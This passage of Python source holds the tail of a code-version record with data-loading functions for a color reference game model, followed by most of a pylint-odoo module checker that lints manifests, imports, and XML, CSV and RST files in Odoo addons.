colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef 
get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return 
output\n",
"step-5": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\ndef get_data():\n df = pd.read_csv(\"./data/filteredCorpus.csv\")\n df_filt = df[df['outcome']==True] # use only successful games\n df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances\n df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances\n\n # making a list of utterances that we want to use, so we can take these rows from df_filt\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once\n\n # df_filt = df_filt[df_filt['numCleanWords'] == 1]\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation\n df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use\n\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n\n return df_final, le\n\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)\n print(\"length colors and contents\", len(df['colors']), len(df['contents']))\n print(\"set colors and contents\", 
len(set(df['colors'])), len(set(df['contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances\n # row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()\n meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix\n\n for i in range(len(meaning_mat[:,0])):\n if sum(meaning_mat[i,:]) == 0:\n print(\"meaning mat is 0 for this row: \", i)\n for j in range(len(meaning_mat[0,:])):\n if meaning_mat[i,j] == 0:\n print(\"meaning mat is 0 at: \", i,j,\" !!!\")\n return meaning_mat, colors_le\n\n\n\n\n# Literal listener data function\n\n\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n # return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), 
total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n# Literal Speaker data function - hi r u ok\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)\n output.append([color, utt])\n\n return output # [referent, utterance_idx]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Visit module to add odoo checks
"""
import os
import re
import astroid
import isort
from pylint.checkers import utils
from six import string_types
from .. import misc, settings
# Message catalog for this checker.
# Keys are pylint message ids built from the plugin's base id; values are
# (message template, symbolic name, description) triples.
ODOO_MSGS = {
    # C->convention R->refactor W->warning E->error F->fatal
    # Visit odoo module with settings.BASE_OMODULE_ID
    'C%d02' % settings.BASE_OMODULE_ID: (
        'Missing ./README.rst file. Template here: %s',
        'missing-readme',
        settings.DESC_DFLT
    ),
    'E%d01' % settings.BASE_OMODULE_ID: (
        '%s %s',
        'rst-syntax-error',
        settings.DESC_DFLT
    ),
    'E%d02' % settings.BASE_OMODULE_ID: (
        '%s error: %s',
        'xml-syntax-error',
        settings.DESC_DFLT
    ),
    'W%d01' % settings.BASE_OMODULE_ID: (
        '%s Dangerous filter without explicit `user_id` in xml_id %s',
        'dangerous-filter-wo-user',
        settings.DESC_DFLT
    ),
    'W%d02' % settings.BASE_OMODULE_ID: (
        '%s Duplicate xml record id "%s" in %s',
        'duplicate-xml-record-id',
        settings.DESC_DFLT
    ),
    'W%d03' % settings.BASE_OMODULE_ID: (
        '%s',
        'javascript-lint',
        settings.DESC_DFLT
    ),
    'W%d04' % settings.BASE_OMODULE_ID: (
        '%s Deprecated <openerp> xml node',
        'deprecated-openerp-xml-node',
        settings.DESC_DFLT
    ),
    'W%d05' % settings.BASE_OMODULE_ID: (
        '%s record res.users without '
        'context="{\'no_reset_password\': True}"',
        'create-user-wo-reset-password',
        settings.DESC_DFLT
    ),
    'W%d06' % settings.BASE_OMODULE_ID: (
        '%s Duplicate id "%s"',
        'duplicate-id-csv',
        settings.DESC_DFLT
    ),
    'W%d07' % settings.BASE_OMODULE_ID: (
        '%s Duplicate xml field "%s" in lines %s',
        'duplicate-xml-fields',
        settings.DESC_DFLT
    ),
    'W%d08' % settings.BASE_OMODULE_ID: (
        '%s Missing newline',
        'missing-newline-extrafiles',
        settings.DESC_DFLT
    ),
    'W%d09' % settings.BASE_OMODULE_ID: (
        '%s Redundant name module reference in xml_ids "%s".',
        'redundant-modulename-xml',
        settings.DESC_DFLT
    ),
    'W%d10' % settings.BASE_OMODULE_ID: (
        '%s Use wrong tabs indentation instead of four spaces',
        'wrong-tabs-instead-of-spaces',
        settings.DESC_DFLT
    ),
    'R%d80' % settings.BASE_OMODULE_ID: (
        'Consider merging classes inherited to "%s" from %s.',
        'consider-merging-classes-inherited',
        settings.DESC_DFLT
    ),
    'W%d50' % settings.BASE_OMODULE_ID: (
        'Same Odoo module absolute import. You should use '
        'relative import with "." '
        'instead of "openerp.addons.%s"',
        'odoo-addons-relative-import',
        settings.DESC_DFLT
    ),
    'W%d40' % settings.BASE_OMODULE_ID: (
        '%s Dangerous use of "replace" from view '
        'with priority %s < %s. '
        'Increase priority or don\'t use "replace". '
        'For more information see https://odoo-development.readthedocs.io/en/latest/dev/xml/inherit.html#collisions-and-priority ',
        'dangerous-view-replace-wo-priority',
        settings.DESC_DFLT
    ),
    'W%d30' % settings.BASE_OMODULE_ID: (
        '%s not used from manifest',
        'file-not-used',
        settings.DESC_DFLT
    ),
    'W%d35' % settings.BASE_OMODULE_ID: (
        'External dependency "%s" without ImportError. More info: '
        'https://odoo-development.readthedocs.io/en/latest/dev/py/external-imports.html'
        '#external-dependencies',
        'missing-import-error',
        settings.DESC_DFLT
    ),
    'W%d36' % settings.BASE_OMODULE_ID: (
        'Missing external dependency "%s" from manifest. More info: '
        'https://github.com/OCA/odoo-community.org/blob/master/website/'
        'Contribution/CONTRIBUTING.rst'
        '#external-dependencies',
        'missing-manifest-dependency',
        settings.DESC_DFLT
    ),
    'W%d38' % settings.BASE_OMODULE_ID: (
        'pass into block except. '
        'If you really need to use the pass consider logging that exception',
        'except-pass',
        settings.DESC_DFLT
    ),
    'W%d37' % settings.BASE_OMODULE_ID: (
        '%s The xml attribute is missing the translation="off" tag %s',
        'xml-attribute-translatable',
        settings.DESC_DFLT
    ),
    'W%d42' % settings.BASE_OMODULE_ID: (
        '%s Deprecated <tree> xml attribute "%s"',
        'xml-deprecated-tree-attribute',
        settings.DESC_DFLT
    ),
    'W%d43' % settings.BASE_OMODULE_ID: (
        '%s Deprecated QWeb directive "%s". Use "t-options" instead',
        'xml-deprecated-qweb-directive',
        settings.DESC_DFLT
    ),
    'W%d39' % settings.BASE_OMODULE_ID: (
        '%s Use <odoo> instead of <odoo><data> or use <odoo noupdate="1">'
        'instead of <odoo><data noupdate="1">',
        'deprecated-data-xml-node',
        settings.DESC_DFLT
    ),
    'W%d44' % settings.BASE_OMODULE_ID: (
        # Fixed typos in the user-facing message: "in in" -> "in",
        # "chararter" -> "character".
        '%s The resource in src/href contains a not valid character',
        'character-not-valid-in-resource-link',
        settings.DESC_DFLT
    ),
}
# URL shown to the user when README.rst is missing.
DFTL_README_TMPL_URL = 'https://github.com/OCA/maintainer-tools' + \
    '/blob/master/template/module/README.rst'
# Any of these file names satisfies the missing-readme check.
DFTL_README_FILES = ['README.rst', 'README.md', 'README.txt']
# Views replacing fields with a priority below this are flagged.
DFTL_MIN_PRIORITY = 99
# Files supported from manifest to convert
# Extracted from openerp/tools/convert.py:def convert_file
DFLT_EXTFILES_CONVERT = ['csv', 'sql', 'xml', 'yml']
DFLT_EXTFILES_TO_LINT = DFLT_EXTFILES_CONVERT + [
    'po', 'js', 'mako', 'rst', 'md', 'markdown']
# Import names that never trigger missing-import-error /
# missing-manifest-dependency ('*' and '?' wildcards are supported).
DFLT_IMPORT_NAME_WHITELIST = [
    # self-odoo
    'odoo', 'openerp',
    # packages for unit tests only
    'requests_mock',
    # Known external packages of odoo
    'PIL', 'anybox.testing.openerp', 'argparse', 'babel',
    'dateutil', 'decorator', 'docutils', 'faces', 'feedparser',
    'gdata', 'gevent', 'greenlet', 'jcconv', 'jinja2',
    'ldap', 'lxml', 'mako', 'markupsafe', 'mock', 'odf',
    'ofxparse', 'openid', 'passlib', 'pkg_resources',
    'psutil', 'psycogreen', 'psycopg2', 'pyPdf', 'pychart',
    'pydot', 'pyparsing', 'pytz', 'qrcode', 'reportlab',
    'requests', 'serial', 'simplejson', 'six', 'suds',
    'unittest2', 'usb', 'vatnumber', 'vobject', 'werkzeug',
    'wsgiref', 'xlsxwriter', 'xlwt', 'yaml',
]
# Default jslint configuration shipped next to this package.
DFTL_JSLINTRC = os.path.join(
    os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
    'examples', '.jslintrc'
)
DFLT_DEPRECATED_TREE_ATTRS = ['colors', 'fonts', 'string']
# Manifest keys whose values are lists of data file paths.
DFTL_MANIFEST_DATA_KEYS = ['data', 'demo', 'demo_xml', 'init_xml', 'test',
                           'update_xml']
class ModuleChecker(misc.WrapperModuleChecker):
    # Pylint checker that validates odoo module layout: manifest, xml/csv
    # data files, README, javascript, and import hygiene.
    # Section name used in pylint configuration files for this checker.
    name = settings.CFG_SECTION
    msgs = ODOO_MSGS
    # Checker-specific configuration options exposed as pylint flags.
    options = (
        ('readme_template_url', {
            'type': 'string',
            'metavar': '<string>',
            'default': DFTL_README_TMPL_URL,
            'help': 'URL of README.rst template file',
        }),
        ('extfiles_to_lint', {
            'type': 'csv',
            'metavar': '<comma separated values>',
            'default': DFLT_EXTFILES_TO_LINT,
            'help': 'List of extension files to check separated by a comma.'
        }),
        ('min-priority', {
            'type': 'int',
            'metavar': '<int>',
            'default': DFTL_MIN_PRIORITY,
            'help': 'Minimum priority number of a view with replace of fields.'
        }),
        ('extfiles_convert', {
            'type': 'csv',
            'metavar': '<comma separated values>',
            'default': DFLT_EXTFILES_CONVERT,
            'help': 'List of extension files supported to convert '
                    'from manifest separated by a comma.'
        }),
        ('import_name_whitelist', {
            'type': 'csv',
            'metavar': '<comma separated values>',
            'default': DFLT_IMPORT_NAME_WHITELIST,
            'help': 'List of known import dependencies of odoo,'
                    ' separated by a comma.'
        }),
        ('jslintrc', {
            'type': 'string',
            'metavar': '<path to file>',
            'default': os.environ.get('PYLINT_ODOO_JSLINTRC') or DFTL_JSLINTRC,
            'help': ('A path to a file that contains a configuration file of '
                     'javascript lint. You can use the environment variable '
                     '"PYLINT_ODOO_JSLINTRC" too. Default: %s' % DFTL_JSLINTRC)
        }),
        ('deprecated_tree_attributes', {
            'type': 'multiple_choice',
            'metavar': '<attributes>',
            'default': DFLT_DEPRECATED_TREE_ATTRS,
            'choices': DFLT_DEPRECATED_TREE_ATTRS,
            'help': 'List of deprecated list view attributes,'
                    ' separated by a comma. Valid values: %s' % ', '.join(
                        DFLT_DEPRECATED_TREE_ATTRS)
        }),
    )
    # Odoo version bounds per message; presumably consumed by the base
    # class to skip checks outside the range — TODO confirm in misc.
    odoo_check_versions = {
        'missing-import-error': {
            'max_odoo_version': '11.0',
        },
    }
    class_inherit_names = []
    @utils.check_messages('consider-merging-classes-inherited')
    def visit_assign(self, node):
        """Cache ``_inherit = '...'`` assignments so ``close()`` can report
        classes of the same odoo module inheriting the same model.

        Only plain string assignments to ``_name``/``_inherit`` directly
        inside a class body are considered.
        """
        if not self.odoo_node:
            return
        if not self.linter.is_message_enabled(
                'consider-merging-classes-inherited', node.lineno):
            return
        node_left = node.targets[0]
        if not isinstance(node_left, astroid.node_classes.AssignName) or \
                node_left.name not in ('_inherit', '_name') or \
                not isinstance(node.value, astroid.node_classes.Const) or \
                not isinstance(node.parent, astroid.ClassDef):
            return
        if node_left.name == '_name':
            # Remember the declared model name on the class node; this
            # relies on `_name` being visited before `_inherit`.
            node.parent.odoo_attribute_name = node.value.value
            return
        _name = getattr(node.parent, 'odoo_attribute_name', None)
        _inherit = node.value.value
        if _name and _name != _inherit:
            # Skip _name='model.name' _inherit='other.model' because is valid
            return
        key = (self.odoo_node, _inherit)
        node.file = self.linter.current_file
        self.inh_dup.setdefault(key, []).append(node)
def _build_whitelist_module_patterns(self):
known_patterns = []
for known_pattern in self.config.import_name_whitelist:
pattern = known_pattern.replace('*', '.*').replace('?', '.?')
known_patterns.append(re.compile('^' + pattern + '$'))
return known_patterns
def open(self):
"""Define variables to use cache"""
self.inh_dup = {}
patterns = self._build_whitelist_module_patterns()
self._whitelist_module_patterns = patterns
super(ModuleChecker, self).open()
    def close(self):
        """Final process get all cached values and add messages"""
        # Each cache entry groups the classes of one odoo module that
        # assign the same `_inherit` model; one node is fine, two or
        # more are merge candidates.
        for (odoo_node, class_dup_name), nodes in self.inh_dup.items():
            if len(nodes) == 1:
                continue
            path_nodes = []
            # Report on the first occurrence; the remaining locations
            # are listed in the message arguments.
            for node in nodes[1:]:
                relpath = os.path.relpath(node.file,
                                          os.path.dirname(odoo_node.file))
                path_nodes.append("%s:%d" % (relpath, node.lineno))
            self.add_message('consider-merging-classes-inherited',
                             node=nodes[0],
                             args=(class_dup_name, ', '.join(path_nodes)))
    def _get_odoo_module_imported(self, node):
        """Return the addon names imported by ``node`` through the
        absolute ``openerp.addons``/``odoo.addons`` namespace.

        :param node: astroid Import or ImportFrom node
        :return: list of addon names (possibly empty)
        """
        odoo_module = []
        if isinstance(node, astroid.ImportFrom) and \
                ('openerp.addons' in node.modname or
                 'odoo.addons' in node.modname):
            packages = node.modname.split('.')
            if len(packages) >= 3:
                # from openerp.addons.odoo_module import models
                odoo_module.append(packages[2])
            else:
                # from openerp.addons import odoo_module
                odoo_module.append(node.names[0][0])
        elif isinstance(node, astroid.Import):
            for name, _ in node.names:
                if 'openerp.addons' not in name and 'odoo.addons' not in name:
                    continue
                packages = name.split('.')
                if len(packages) >= 3:
                    # import openerp.addons.odoo_module
                    odoo_module.append(packages[2])
        return odoo_module
def check_odoo_relative_import(self, node):
if self.odoo_module_name in self._get_odoo_module_imported(node):
self.add_message('odoo-addons-relative-import', node=node,
args=(self.odoo_module_name))
@staticmethod
def _is_absolute_import(node, name):
modnode = node.root()
importedmodnode = ModuleChecker._get_imported_module(node, name)
if importedmodnode and importedmodnode.file and \
modnode is not importedmodnode and \
importedmodnode.name != name:
return True
return False
@staticmethod
def _get_imported_module(importnode, modname):
try:
return importnode.do_import_module(modname)
except:
pass
def _is_module_name_in_whitelist(self, module_name):
# Try to find most specific placement instruction match (if any)
# (from isort place_module() method)
parts = module_name.split('.')
module_names_to_check = [
'.'.join(parts[:first_k])
for first_k in range(len(parts), 0, -1)
]
# Check if one of the module name is part of the whitelist.
# For an module name such as 'anybox.testing.openerp', the
# modules names to check will be:
# ['anybox.testing.openerp', 'anybox.testing', 'anybox']
# Only one of them has to be in the whitelist to be accepted.
for module_name_to_check in module_names_to_check:
for pattern in self._whitelist_module_patterns:
if pattern.match(module_name_to_check):
return True
return False
    def _check_imported_packages(self, node, module_name):
        """Check if the import node is a external dependency to validate it"""
        if not module_name:
            # skip local packages because is not a external dependency.
            return
        if not self.manifest_dict:
            # skip if is not a module of odoo
            return
        if not isinstance(node.parent, astroid.Module):
            # skip nested import sentences
            return
        if self._is_absolute_import(node, module_name):
            # skip absolute imports
            return
        if self._is_module_name_in_whitelist(module_name):
            # ignore whitelisted modules
            return
        # Let isort classify the module; only first/third-party imports
        # count as external dependencies.
        isort_obj = isort.SortImports(file_contents='')
        import_category = isort_obj.place_module(module_name)
        if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):
            # skip if is not a external library or is a white list library
            return
        relpath = os.path.relpath(
            node.parent.file, os.path.dirname(self.manifest_file))
        if os.path.dirname(relpath) == 'tests':
            # import errors rules don't apply to the test files
            # since these files are loaded only when running tests
            # and in such a case your
            # module and their external dependencies are installed.
            return
        self.add_message('missing-import-error', node=node,
                         args=(module_name,))
        ext_deps = self.manifest_dict.get('external_dependencies') or {}
        py_ext_deps = ext_deps.get('python') or []
        # NOTE(review): relative `from . import x` escapes only the
        # manifest-dependency check, not missing-import-error above —
        # presumably intentional ordering; verify.
        if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:
            return
        if module_name not in py_ext_deps and \
                module_name.split('.')[0] not in py_ext_deps:
            self.add_message('missing-manifest-dependency', node=node,
                             args=(module_name,))
@utils.check_messages('odoo-addons-relative-import',
'missing-import-error',
'missing-manifest-dependency')
def visit_importfrom(self, node):
self.check_odoo_relative_import(node)
if isinstance(node.scope(), astroid.Module):
package = node.modname
self._check_imported_packages(node, package)
@utils.check_messages('odoo-addons-relative-import',
'missing-import-error',
'missing-manifest-dependency')
def visit_import(self, node):
self.check_odoo_relative_import(node)
for name, _ in node.names:
if isinstance(node.scope(), astroid.Module):
self._check_imported_packages(node, name)
@utils.check_messages('except-pass')
def visit_tryexcept(self, node):
"""Visit block try except"""
for handler in node.handlers:
if (not handler.name and
len(handler.body) == 1 and
isinstance(handler.body[0], astroid.node_classes.Pass)):
self.add_message('except-pass', node=handler)
    def _check_rst_syntax_error(self):
        """Check if rst file there is syntax error
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        rst_files = self.filter_files_ext('rst')
        self.msg_args = []
        for rst_file in rst_files:
            errors = self.check_rst_syntax(
                os.path.join(self.module_path, rst_file))
            for error in errors:
                msg = error.full_message
                # Ignore unknown-directive/role errors: plain docutils
                # does not know the sphinx extensions odoo READMEs use.
                res = re.search(
                    r'No directive entry for "([\w|\-]+)"|'
                    r'Unknown directive type "([\w|\-]+)"|'
                    r'No role entry for "([\w|\-]+)"|'
                    r'Unknown interpreted text role "([\w|\-]+)"', msg)
                # TODO: Add support for sphinx directives after fix
                # https://github.com/twolfson/restructuredtext-lint/issues/29
                if res:
                    # Skip directive errors
                    continue
                # Collapse multi-line messages into a single line.
                self.msg_args.append((
                    "%s:%d" % (rst_file, error.line or 0),
                    msg.strip('\n').replace('\n', '|')))
        if self.msg_args:
            return False
        return True
def _check_missing_readme(self):
"""Check if exists ./README.{rst,md,txt} file
:return: If exists return True else False
"""
self.msg_args = (self.config.readme_template_url,)
for readme in DFTL_README_FILES:
if os.path.isfile(os.path.join(self.module_path, readme)):
return True
return False
def _check_xml_syntax_error(self):
"""Check if xml file there is syntax error
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=True):
result = self.parse_xml(os.path.join(self.module_path, xml_file))
if isinstance(result, string_types):
self.msg_args.append((
xml_file, result.strip('\n').replace('\n', '|')))
if self.msg_args:
return False
return True
def _get_duplicate_xml_record_id(self, records):
"""Get duplicated records based on attribute id
:param records list: List of lxml.etree.Element "<record"
:return: Duplicated items.
e.g. {record.id: [record_node1, record_node2]}
:rtype: dict
"""
all_records = {}
for record in records:
record_id = "%s/%s_noupdate_%s" % (
record.attrib.get('section', ''),
record.attrib.get('id', ''),
record.getparent().attrib.get('noupdate', '0'),
)
all_records.setdefault(record_id, []).append(record)
# Remove all keys which not duplicated
records = {}
for key, items in all_records.items():
if not len(items) < 2:
records[key] = items
return records
    def _check_duplicate_xml_record_id(self):
        """Check duplicated XML-IDs inside of the files of
        each manifest-section treated them separately
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        self.msg_args = []
        xml_records = []
        for fname, section in self._get_manifest_referenced_files().items():
            if os.path.splitext(fname)[1].lower() != '.xml':
                continue
            fname = os.path.join(self.module_path, fname)
            for xml_record in self.get_xml_records(fname):
                # Tag each record with its manifest section ('data',
                # 'demo', ...) so ids only clash within the same section.
                xml_record.attrib['section'] = section
                xml_records.append(xml_record)
        # Report on the first occurrence; the other locations go into
        # the message arguments.
        for name, fobjs in \
                self._get_duplicate_xml_record_id(xml_records).items():
            self.msg_args.append((
                "%s:%d" % (os.path.relpath(fobjs[0].base, self.module_path),
                           fobjs[0].sourceline),
                name,
                ', '.join([os.path.relpath(fobj.base, self.module_path) +
                           ':' + str(fobj.sourceline)
                           for fobj in fobjs[1:]]),
            ))
        if self.msg_args:
            return False
        return True
def _check_duplicate_id_csv(self):
"""Check duplicate xml id in ir.model.access.csv files of a odoo module.
:return: False if exists errors and
add list of errors in self.msg_args
"""
all_csv_ids = []
self.msg_args = []
for csv_file_rel in self.filter_files_ext('csv', relpath=True):
csv_file = os.path.join(self.module_path, csv_file_rel)
if os.path.basename(csv_file) == 'ir.model.access.csv':
all_csv_ids.extend(self.get_field_csv(csv_file))
duplicated_ids_csv = self.get_duplicated_items(all_csv_ids)
for duplicated_id_csv in duplicated_ids_csv:
self.msg_args.append((csv_file_rel, duplicated_id_csv))
if duplicated_ids_csv:
return False
return True
def _check_redundant_modulename_xml(self):
"""Check redundant module name in xml file.
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for xml_file_rel in self.filter_files_ext('xml', relpath=True):
xml_file = os.path.join(self.module_path, xml_file_rel)
for xml_id, lineno in self.get_xml_redundant_module_name(
xml_file, self.module):
self.msg_args.append(
("%s:%d" % (xml_file_rel, lineno), xml_id))
if self.msg_args:
return False
return True
    def _check_character_not_valid_in_resource_link(self):
        """The resource in src/href contains a not valid character.
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        self.msg_args = []
        for xml_file in self.filter_files_ext('xml'):
            doc = self.parse_xml(os.path.join(self.module_path, xml_file))
            for name, attr in (('link', 'href'), ('script', 'src')):
                # parse_xml returns a string on syntax error: skip then.
                nodes = (doc.xpath('.//%s[@%s]' % (name, attr))
                         if not isinstance(doc, string_types) else [])
                for node in nodes:
                    resource = node.get(attr, '')
                    ext = os.path.splitext(os.path.basename(resource))[1]
                    # Flag absolute resources whose extension is not a
                    # plain alphabetic suffix (e.g. ".js?v=1").
                    if (resource.startswith('/') and not
                            re.search('^[.][a-zA-Z]+$', ext)):
                        self.msg_args.append(("%s:%s" % (xml_file,
                                                         node.sourceline)))
        if self.msg_args:
            return False
        return True
    def _get_duplicate_xml_fields(self, fields):
        """Get duplicated xml fields based on attribute name
        :param fields list: List of lxml.etree.Element "<field"
        :return: Duplicated items.
            e.g. {field.name: [field_node1, field_node2]}
        :rtype: dict
        """
        all_fields = {}
        for field in fields:
            field_xml = field.attrib.get('name')
            if not field_xml:
                continue
            # Fields only clash when name, context, filter_domain and
            # parent node all match (search views may repeat a name with
            # different context/filter_domain on purpose).
            all_fields.setdefault(
                (field_xml, field.attrib.get('context'),
                 field.attrib.get('filter_domain'),
                 field.getparent()), []).append(field)
        # Keep only the keys that are actually duplicated (2+ nodes).
        return dict(((name, context, filter_domain, parent_node), nodes) for
                    (name, context, filter_domain, parent_node), nodes in
                    all_fields.items() if len(nodes) >= 2)
    def _check_duplicate_xml_fields(self):
        """Check duplicate field in all record of xml files of a odoo module.
        Important note: this check does not work with inherited views.
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        self.msg_args = []
        for xml_file in self.filter_files_ext('xml', relpath=True):
            for record in self.get_xml_records(
                    os.path.join(self.module_path, xml_file)):
                if record.xpath('field[@name="inherit_id"]'):
                    # Inherited views may legitimately repeat fields.
                    continue
                # Look both at the record level and inside embedded
                # arch definitions (tree/form inside a field).
                for xpath in ['field', 'field/*/field',
                              'field/*/field/tree/field',
                              'field/*/field/form/field']:
                    for name, fobjs in self._get_duplicate_xml_fields(
                            record.xpath(xpath)).items():
                        self.msg_args.append((
                            "%s:%d" % (xml_file, fobjs[0].sourceline), name[0],
                            ', '.join([str(fobj.sourceline)
                                       for fobj in fobjs[1:]]),
                        ))
        if self.msg_args:
            return False
        return True
    def _check_dangerous_filter_wo_user(self):
        """Check dangerous filter without a user assigned.

        Note: stops and reports on the first offending record found.
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        xml_files = self.filter_files_ext('xml')
        for xml_file in xml_files:
            ir_filter_records = self.get_xml_records(
                os.path.join(self.module_path, xml_file), model='ir.filters')
            for ir_filter_record in ir_filter_records:
                ir_filter_fields = ir_filter_record.xpath(
                    "field[@name='name' or @name='user_id']")
                # if exists field="name" then is a new record
                # then should be field="user_id" too
                if ir_filter_fields and len(ir_filter_fields) == 1:
                    # TODO: Add a list of msg_args before of return
                    # TODO: Add source lineno in all xml checks
                    self.msg_args = (
                        "%s:%d" % (xml_file, ir_filter_record.sourceline),
                        ir_filter_record.get('id'),)
                    return False
        return True
@staticmethod
def _get_priority(view):
try:
priority_node = view.xpath("field[@name='priority'][1]")[0]
return int(priority_node.get('eval', priority_node.text) or 0)
